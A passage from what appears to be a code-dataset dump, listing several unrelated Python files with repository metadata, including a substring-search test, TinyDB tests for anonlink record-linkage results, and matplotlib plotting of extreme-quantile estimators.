aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab"
res = str_str(haystack, needle)
print(res)
| 1,521.175 | 50,017 | 0.993278 | 112 | 60,847 | 539.508929 | 0.267857 | 0.000397 | 0.000695 | 0.000662 | 0.002847 | 0.002085 | 0.001357 | 0.001357 | 0.001357 | 0.001357 | 0 | 0.000182 | 0.005045 | 60,847 | 39 | 50,018 | 1,560.179487 | 0.997919 | 0.001315 | 0 | 0.333333 | 0 | 0 | 0.987607 | 0.987476 | 0 | 1 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0 | 0 | 0.333333 | 0.037037 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e5b2ae8390c9943c0ef0a7d822b1ecb19ca1591c | 96 | py | Python | topnum/search_methods/topic_bank/__init__.py | machine-intelligence-laboratory/OptimalNumberOfTopics | 87267223987a4cb54b3f0ec431e87ee684044c7b | [
"MIT"
] | 5 | 2020-05-06T14:13:54.000Z | 2020-09-06T15:54:01.000Z | topnum/search_methods/topic_bank/__init__.py | machine-intelligence-laboratory/OptimalNumberOfTopics | 87267223987a4cb54b3f0ec431e87ee684044c7b | [
"MIT"
] | 54 | 2020-02-10T07:08:31.000Z | 2020-09-08T21:45:39.000Z | topnum/search_methods/topic_bank/__init__.py | machine-intelligence-laboratory/OptimalNumberOfTopics | 87267223987a4cb54b3f0ec431e87ee684044c7b | [
"MIT"
] | 2 | 2021-01-16T08:40:25.000Z | 2021-06-04T05:35:36.000Z | from .bank_update_method import BankUpdateMethod
from .topic_bank_method import TopicBankMethod
| 32 | 48 | 0.895833 | 12 | 96 | 6.833333 | 0.666667 | 0.292683 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 96 | 2 | 49 | 48 | 0.931818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e5da31f7a8c5416a5ce0fafdbc6f86e10f5a25b7 | 143 | py | Python | test/tests/ctypes_test.py | jmgc/pyston | 9f672c1bbb75710ac17dd3d9107da05c8e9e8e8f | [
"BSD-2-Clause",
"Apache-2.0"
] | 1 | 2020-02-06T14:28:45.000Z | 2020-02-06T14:28:45.000Z | test/tests/ctypes_test.py | jmgc/pyston | 9f672c1bbb75710ac17dd3d9107da05c8e9e8e8f | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | test/tests/ctypes_test.py | jmgc/pyston | 9f672c1bbb75710ac17dd3d9107da05c8e9e8e8f | [
"BSD-2-Clause",
"Apache-2.0"
] | 1 | 2020-02-06T14:29:00.000Z | 2020-02-06T14:29:00.000Z | from ctypes import *
s = "tmp"
ap = create_string_buffer(s)
print type(ap)
print type(c_void_p.from_param(ap))
print type(cast(ap, c_char_p))
| 17.875 | 35 | 0.741259 | 28 | 143 | 3.535714 | 0.607143 | 0.272727 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125874 | 143 | 7 | 36 | 20.428571 | 0.792 | 0 | 0 | 0 | 0 | 0 | 0.020979 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
f92d1728bec9d3b509bc5af926af706e927377e4 | 80 | py | Python | pysiclib/api/linalg.py | ShameekConyers/sicnumerical | dc5035e5d922cb8e4341c5fbd88adba4f5d09bea | [
"MIT"
] | null | null | null | pysiclib/api/linalg.py | ShameekConyers/sicnumerical | dc5035e5d922cb8e4341c5fbd88adba4f5d09bea | [
"MIT"
] | null | null | null | pysiclib/api/linalg.py | ShameekConyers/sicnumerical | dc5035e5d922cb8e4341c5fbd88adba4f5d09bea | [
"MIT"
] | null | null | null | from .._pysiclib import linalg as _impl_linalg
from .._pysiclib.linalg import *
| 26.666667 | 46 | 0.8 | 11 | 80 | 5.454545 | 0.545455 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 80 | 2 | 47 | 40 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0077a1fcd62adc3d1c1934c38ac9190c1d85d2b6 | 25 | py | Python | OOP/welcome.py | Ahmad-Fahad/Python | 5a5f8f3395f7085947430b8309f6af70b2e25a77 | [
"Apache-2.0"
] | null | null | null | OOP/welcome.py | Ahmad-Fahad/Python | 5a5f8f3395f7085947430b8309f6af70b2e25a77 | [
"Apache-2.0"
] | null | null | null | OOP/welcome.py | Ahmad-Fahad/Python | 5a5f8f3395f7085947430b8309f6af70b2e25a77 | [
"Apache-2.0"
] | null | null | null | print "Welcome to Python" | 25 | 25 | 0.8 | 4 | 25 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12 | 25 | 1 | 25 | 25 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0.653846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
008b8b986e75215552f445451e82aa92b20fe457 | 27 | py | Python | idevbca/__init__.py | forzadraco/idevbca | c74da4b74ae01c76c5390fe2e7985bec5408144b | [
"MIT"
] | 1 | 2017-12-19T18:53:21.000Z | 2017-12-19T18:53:21.000Z | idevbca/__init__.py | forzadraco/idevbca | c74da4b74ae01c76c5390fe2e7985bec5408144b | [
"MIT"
] | null | null | null | idevbca/__init__.py | forzadraco/idevbca | c74da4b74ae01c76c5390fe2e7985bec5408144b | [
"MIT"
] | null | null | null | from idevbca.Bca import Bca | 27 | 27 | 0.851852 | 5 | 27 | 4.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 27 | 1 | 27 | 27 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
00c492e73949906fdce2a39b27d7d8691ead651f | 2,653 | py | Python | tests/anonlink_test.py | Sam-Gresh/linkage-agent-tools | f405c7efe3fa82d99bc047f130c0fac6f3f5bf82 | [
"Apache-2.0"
] | null | null | null | tests/anonlink_test.py | Sam-Gresh/linkage-agent-tools | f405c7efe3fa82d99bc047f130c0fac6f3f5bf82 | [
"Apache-2.0"
] | null | null | null | tests/anonlink_test.py | Sam-Gresh/linkage-agent-tools | f405c7efe3fa82d99bc047f130c0fac6f3f5bf82 | [
"Apache-2.0"
] | null | null | null | import pytest
import os
from tinydb import TinyDB, Query
from dcctools.anonlink import Results
def test_insert_results():
db_location = 'tests/test_db.json'
systems = ['a', 'b', 'c']
project = 'name-dob'
anonlink_results = {'groups': [[[0, 1], [1, 2], [2, 3]],
[[1, 5], [2, 6]],
[[0, 8], [2, 9]]]}
if os.path.exists(db_location):
os.remove(db_location)
database = TinyDB(db_location)
r = Results(systems, project, anonlink_results)
r.insert_results(database)
assert len(database) == 3
RecordGroup = Query()
doc = database.search(RecordGroup['a'].any([1]))
assert doc[0]['b'] == [2]
assert doc[0]['c'] == [3]
doc = database.search(RecordGroup['b'].any([5]))
assert doc[0]['c'] == [6]
doc = database.search(RecordGroup['a'].any([8]))
assert doc[0]['c'] == [9]
def test_insert_conflicting_results_split_group():
db_location = 'tests/test_db.json'
systems = ['a', 'b']
project1 = 'name-dob'
anonlink_results1 = {'groups': [[[0, 1], [1, 2]],
[[0, 8], [1, 9]]]}
if os.path.exists(db_location):
os.remove(db_location)
database = TinyDB(db_location)
r = Results(systems, project1, anonlink_results1)
r.insert_results(database)
assert len(database) == 2
RecordGroup = Query()
doc = database.search(RecordGroup['a'].any([1]))
assert doc[0]['b'] == [2]
doc = database.search(RecordGroup['b'].any([9]))
assert doc[0]['a'] == [8]
project2 = 'name-sex'
anonlink_results2 = {'groups': [[[0, 1], [1, 9]],
[[0, 20], [1, 30]]]}
r = Results(systems, project2, anonlink_results2)
r.insert_results(database)
assert len(database) == 2
doc = database.search(RecordGroup['a'].any([1]))
assert doc[0]['b'] == [2, 9]
def test_insert_conflicting_results_same_group():
db_location = 'tests/test_db.json'
systems = ['a', 'b']
project1 = 'name-dob'
anonlink_results1 = {'groups': [[[0, 1], [1, 2]],
[[0, 8], [1, 9]]]}
if os.path.exists(db_location):
os.remove(db_location)
database = TinyDB(db_location)
r = Results(systems, project1, anonlink_results1)
r.insert_results(database)
assert len(database) == 2
RecordGroup = Query()
doc = database.search(RecordGroup['a'].any([1]))
assert doc[0]['b'] == [2]
doc = database.search(RecordGroup['b'].any([9]))
assert doc[0]['a'] == [8]
project2 = 'name-sex'
anonlink_results2 = {'groups': [[[0, 1], [1, 10]],
[[0, 20], [1, 30]]]}
r = Results(systems, project2, anonlink_results2)
r.insert_results(database)
assert len(database) == 3
doc = database.search(RecordGroup['a'].any([1]))
assert doc[0]['b'] == [2, 10]
assert len(doc[0]['run_results']) == 2
| 24.118182 | 58 | 0.619676 | 376 | 2,653 | 4.257979 | 0.151596 | 0.074953 | 0.062461 | 0.157402 | 0.853217 | 0.846346 | 0.766396 | 0.766396 | 0.740162 | 0.718926 | 0 | 0.048248 | 0.171881 | 2,653 | 109 | 59 | 24.33945 | 0.680473 | 0 | 0 | 0.697368 | 0 | 0 | 0.060686 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 1 | 0.039474 | false | 0 | 0.052632 | 0 | 0.092105 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
00e266b27758bccaaa6aca6e74acbe6b2444e13f | 93 | py | Python | mlbriefcase/python/__init__.py | Bhaskers-Blu-Org2/Briefcase | f551079b05d3f8494cdff6a0b393969def5a2443 | [
"MIT"
] | 2 | 2020-05-04T12:59:05.000Z | 2020-05-05T09:31:43.000Z | mlbriefcase/python/__init__.py | Bhaskers-Blu-Org2/Briefcase | f551079b05d3f8494cdff6a0b393969def5a2443 | [
"MIT"
] | 4 | 2020-02-05T11:34:51.000Z | 2020-02-05T11:35:12.000Z | mlbriefcase/python/__init__.py | microsoft/Briefcase | f551079b05d3f8494cdff6a0b393969def5a2443 | [
"MIT"
] | 5 | 2020-06-30T16:02:57.000Z | 2021-09-15T06:39:08.000Z | from .sqlalchemy import *
from .keyring import *
from .jupyterlab_credentialprovider import * | 31 | 44 | 0.817204 | 10 | 93 | 7.5 | 0.6 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11828 | 93 | 3 | 44 | 31 | 0.914634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
daa690964f4a1bf8e24289407c95e06525ab88a4 | 44 | py | Python | mmcv_custom/__init__.py | MendelXu/mmdetection-1 | 0501bdf54fc62a04c44b241829af9a8397c45ca9 | [
"Apache-2.0"
] | 2 | 2021-06-24T19:36:04.000Z | 2021-06-24T20:32:31.000Z | mmcv_custom/__init__.py | MendelXu/mmdetection-1 | 0501bdf54fc62a04c44b241829af9a8397c45ca9 | [
"Apache-2.0"
] | null | null | null | mmcv_custom/__init__.py | MendelXu/mmdetection-1 | 0501bdf54fc62a04c44b241829af9a8397c45ca9 | [
"Apache-2.0"
] | 1 | 2021-01-19T05:33:48.000Z | 2021-01-19T05:33:48.000Z | from .fileio import *
from .runner import *
| 14.666667 | 21 | 0.727273 | 6 | 44 | 5.333333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 44 | 2 | 22 | 22 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dac0824cb6ab4dfa42fd08ec774aec2cd56bea8c | 66 | py | Python | inventory/tests.py | ohing504/django-inventory | 1a262b826e8e904a7196fe0f0c0645dcd428f3f9 | [
"MIT"
] | null | null | null | inventory/tests.py | ohing504/django-inventory | 1a262b826e8e904a7196fe0f0c0645dcd428f3f9 | [
"MIT"
] | 2 | 2020-06-05T17:12:32.000Z | 2021-06-10T18:12:45.000Z | inventory/tests.py | ohing504/django-inventory | 1a262b826e8e904a7196fe0f0c0645dcd428f3f9 | [
"MIT"
] | null | null | null | from django.test import TestCase
def test_dummy():
assert 1
| 11 | 32 | 0.727273 | 10 | 66 | 4.7 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019231 | 0.212121 | 66 | 5 | 33 | 13.2 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
daf2eb8734aa87adedd5d42f9870b8edd5e6a06b | 16,037 | py | Python | extreme/visualization.py | michael-allouche/refined-weissman | f925acf4953e75d3bc5f6a2fd533a021b2c999d5 | [
"MIT"
] | null | null | null | extreme/visualization.py | michael-allouche/refined-weissman | f925acf4953e75d3bc5f6a2fd533a021b2c999d5 | [
"MIT"
] | null | null | null | extreme/visualization.py | michael-allouche/refined-weissman | f925acf4953e75d3bc5f6a2fd533a021b2c999d5 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
from extreme.estimators import evt_estimators, real_estimators, list_estimators, ExtremeQuantileEstimator, random_forest_k
from extreme.data_management import DataSampler
from pathlib import Path
import matplotlib.pyplot as plt
import seaborn as sns
import os
def evt_quantile_plot(n_replications, n_data, distribution, params, n_quantile, saved=False):
"""extreme quantile plot of just the evt estimatorsat level 1/2n for different replications with variance and MSE"""
pathdir = Path("ckpt", n_quantile, distribution, "extrapolation", str(params))
pathdir.mkdir(parents=True, exist_ok=True)
anchor_points = np.arange(2, n_data) # 1, ..., n-1
if n_quantile == "2n":
EXTREME_ALPHA = 1 / (2 * n_data) # extreme alpha
elif n_quantile == "n":
EXTREME_ALPHA = 1 / (n_data) # extreme alpha
else:
return "The 'n_quantile' doesn't exist. PLese choose between {'n', '2n'}."
data_sampler = DataSampler(distribution=distribution, params=params)
real_quantile = data_sampler.ht_dist.tail_ppf(1 / EXTREME_ALPHA) # real extreme quantile
try:
dict_evt = np.load(Path(pathdir, "evt_estimators_rep{}.npy".format(n_replications)), allow_pickle=True)[()]
except FileNotFoundError:
dict_evt = evt_estimators(n_replications, n_data, distribution, params, n_quantile, return_full=True)
fig, axes = plt.subplots(3, 1, figsize=(15, 3 * 5), sharex=False, squeeze=False) # 3 plots: quantile, var, mse
for estimator in dict_evt.keys():
axes[0, 0].plot(anchor_points, dict_evt[estimator]["series"],
label="{} (rmse={:.2f})".format(estimator, dict_evt[estimator]["rmse_bestK"],
), linestyle="-.")
axes[1, 0].plot(anchor_points, dict_evt[estimator]["var"],
label="{} (rmse={:.2f})".format(estimator, dict_evt[estimator]["rmse_bestK"],
), linestyle="-.")
axes[2, 0].plot(anchor_points, dict_evt[estimator]["rmse"],
label="{} (rmse={:.2f})".format(estimator, dict_evt[estimator]["rmse_bestK"],
), linestyle="-.")
axes[0, 0].hlines(y=real_quantile, xmin=0., xmax=n_data,
label="reference line", color="black", linestyle="--")
axes[0, 0].legend()
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
# title / axis
axes[0, 0].set_xlabel(r"anchor point $k$")
axes[0, 0].set_ylabel("quantile")
axes[0, 0].set_title("Bias estimator")
axes[1, 0].set_xlabel(r"anchor point $k$")
axes[1, 0].set_ylabel("variance")
axes[1, 0].set_title("Variance estimator")
axes[1, 0].spines["left"].set_color("black")
axes[1, 0].spines["bottom"].set_color("black")
axes[2, 0].set_xlabel(r"anchor point $k$")
axes[2, 0].set_ylabel("RMSE")
axes[2, 0].set_title("RMSE estimator")
axes[2, 0].spines["left"].set_color("black")
axes[2, 0].spines["bottom"].set_color("black")
# y_lim
# axes[0, 0].set_ylim(real_quantile*0.8, real_quantile*1.2) # 100
axes[0, 0].set_ylim(real_quantile*0.5, real_quantile*2) #real_quantile*3) # QUANTILE
axes[1, 0].set_ylim(np.min(dict_evt["CW"]["var"]) * 0.5, np.min(dict_evt["CW"]["var"]) * 2) # VARIANCE
# axes[1, 0].set_ylim(0, 22) # VARIANCE
axes[2, 0].set_ylim(0, 1) # MSE
fig.tight_layout()
fig.suptitle("Estimator plot \n{}: {}".format(distribution.upper(), str(params).upper()), fontweight="bold", y=1.04)
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
filename = "simulations-{}-{}-{}-{}-{}-".format(distribution, params, n_replications, n_data, n_quantile)
# plt.savefig(pathdir / "{}.eps".format(filename), format="eps")
plt.savefig(pathdir / "{}.jpg".format(filename))
return
def evt_quantile_plot_paper(n_replications, n_data, distribution, params, n_quantile, plot_type, saved=False):
"""extreme quantile plot of just the evt estimatorsat level 1/2n for different replications with variance and MSE"""
# LIST_ESTIMATORS_PAPER = ["W", "RW", "CW", "CHps", "PRBps"]
LIST_ESTIMATORS_PAPER = ["W", "RW"]
pathdir = Path("ckpt", n_quantile, distribution, "extrapolation", str(params))
pathdir.mkdir(parents=True, exist_ok=True)
anchor_points = np.arange(2, n_data) # 1, ..., n-1
if n_quantile == "2n":
EXTREME_ALPHA = 1 / (2 * n_data) # extreme alpha
elif n_quantile == "n":
EXTREME_ALPHA = 1 / (n_data) # extreme alpha
else:
return "The 'n_quantile' doesn't exist. PLese choose between {'n', '2n'}."
data_sampler = DataSampler(distribution=distribution, params=params)
real_quantile = data_sampler.ht_dist.tail_ppf(1 / EXTREME_ALPHA) # real extreme quantile
try:
dict_evt = np.load(Path(pathdir, "evt_estimators_rep{}.npy".format(n_replications)), allow_pickle=True)[()]
except FileNotFoundError:
dict_evt = evt_estimators(n_replications, n_data, distribution, params, n_quantile, return_full=True)
fig, axes = plt.subplots(1, 1, figsize=(15, 7), sharex=False, squeeze=False)
for estimator in LIST_ESTIMATORS_PAPER:
if plot_type == "bias":
axes[0, 0].plot(anchor_points, dict_evt[estimator]["series"], linestyle="-", linewidth=2)
axes[0, 0].hlines(y=real_quantile, xmin=0., xmax=n_data, color="black", linestyle="--", linewidth=2)
elif plot_type == "rmse":
axes[0, 0].plot(anchor_points, dict_evt[estimator]["rmse"], linestyle="-", linewidth=2)
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
if plot_type == "bias":
axes[0, 0].set_ylim(real_quantile * 0.95, real_quantile * 1.2) # real_quantile*3) # QUANTILE
elif plot_type == "rmse":
axes[0, 0].set_ylim(0, .2) # MSE
fig.tight_layout()
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
filename = "{}-{}-{}-{}-{}-{}-".format(plot_type, distribution, params, n_replications, n_data, n_quantile)
plt.savefig(pathdir / "{}.eps".format(filename), format="eps")
return
def evt_hill_plot(n_replications, n_data, distribution, params, n_quantile, saved=False):
sns.set_style("whitegrid", {'grid.linestyle': '--'})
pathdir = Path("ckpt", n_quantile, distribution, "extrapolation", str(params))
pathdir.mkdir(parents=True, exist_ok=True)
anchor_points = np.arange(2, n_data) # 1, ..., n-1
if n_quantile == "2n":
EXTREME_ALPHA = 1 / (2 * n_data) # extreme alpha
elif n_quantile == "n":
EXTREME_ALPHA = 1 / (n_data) # extreme alpha
else:
return "The 'n_quantile' doesn't exist. PLese choose between {'n', '2n'}."
data_sampler = DataSampler(distribution=distribution, params=params)
X_order = data_sampler.simulate_quantiles(n_data, seed=1) # new quantiles X_1,n, ..., X_n,n
fig, axes = plt.subplots(1, 1, figsize=(15, 7), sharex=False, squeeze=False) # 3 plots: quantile, var, mse
evt_estimators = ExtremeQuantileEstimator(X=X_order, alpha=EXTREME_ALPHA)
anchor_points = np.arange(2, n_data) # 2, ..., n-1
hill_gammas = [evt_estimators.hill(k_anchor) for k_anchor in anchor_points]
bestK = random_forest_k(np.array(hill_gammas), n_forests=10000, seed=42)
k_prime = evt_estimators.get_kprime_rw(n_data-1)[0]
anchor_points_prime = np.arange(2, int(k_prime)+1)
hill_gammas_prime = [evt_estimators.hill(k_anchor) for k_anchor in anchor_points_prime]
axes[0, 0].plot(anchor_points, hill_gammas, color="black")
# axes[0, 0].scatter(bestK , hill_gammas[bestK], s=200, color="red", marker="^")
axes[0, 0].plot(anchor_points_prime, hill_gammas_prime, color="red")
axes[0, 0].hlines(y=params["evi"], xmin=0., xmax=n_data, color="black", linestyle="--")
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
# y_lim
# axes[0, 0].set_ylim(params["evi"] * 0.4, params["evi"] * 2.5) # 100
axes[0, 0].set_ylim(params["evi"] * 0.4, params["evi"] * 2.5) # 100
fig.tight_layout()
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
